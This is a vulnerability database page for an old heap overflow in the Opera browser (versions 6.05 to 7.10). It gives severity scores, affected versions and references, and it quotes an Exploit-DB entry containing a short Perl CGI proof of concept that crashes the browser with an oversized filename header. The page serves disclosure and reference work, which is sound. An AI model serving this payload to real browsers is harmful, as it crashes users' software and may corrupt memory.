Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
Heap-based buffer overflow in Opera 6.05 through 7.10 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a filename with a long extension.
CVE Informations
Related Weaknesses
| Weakness Name | Source | |
|---|---|---|
| Out-of-bounds Write The product writes data past the end, or before the beginning, of the intended buffer. |
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 6.8 | AV:N/AC:M/Au:N/C:P/I:P/A:P | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 22550
Publication date : 2003-04-27 22h00 +00:00
Author : imagine & nesumin
EDB Verified : Yes
source: https://www.securityfocus.com/bid/7450/info
A vulnerability has been reported for Opera versions 7.10 and earlier. The problem is said to occur due to insufficient bounds checking on filename extensions. As a result, it may be possible for an attacker to corrupt heap-based memory.
Successful exploitation of this vulnerability may result in a denial of service, possibly prolonged. If a malicious filename entry were placed in a cache file, Opera may continuously crash until the cache file has been deleted.
#!/usr/bin/perl
# Smash Heap Memory.
# This script is CGI program.
$|=1;
my $filename = "." . "\xCC" x (int(rand(0x20000)) + 0x100);
print "Content-type: text/html\r\n";
print qq~Content-Disposition: filename="$filename"\r\n~;
print "\r\n";
print "<html><body>Love & Peace :)</body></html>\r\n";
Products Mentioned
Configuraton 0
Opera>>Opera_browser >> Version From (including) 6.0 To (including) 7.10
- Opera>>Opera_browser >> Version 6.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.01 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.1 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.1 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.02 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.03 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.04 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.05 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.06 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.10 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.11 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.12 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.01 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.02 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.03 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.10 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.10 (Open CPE detail)
References
http://archives.neohapsis.com/archives/bugtraq/2003-04/0346.html
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
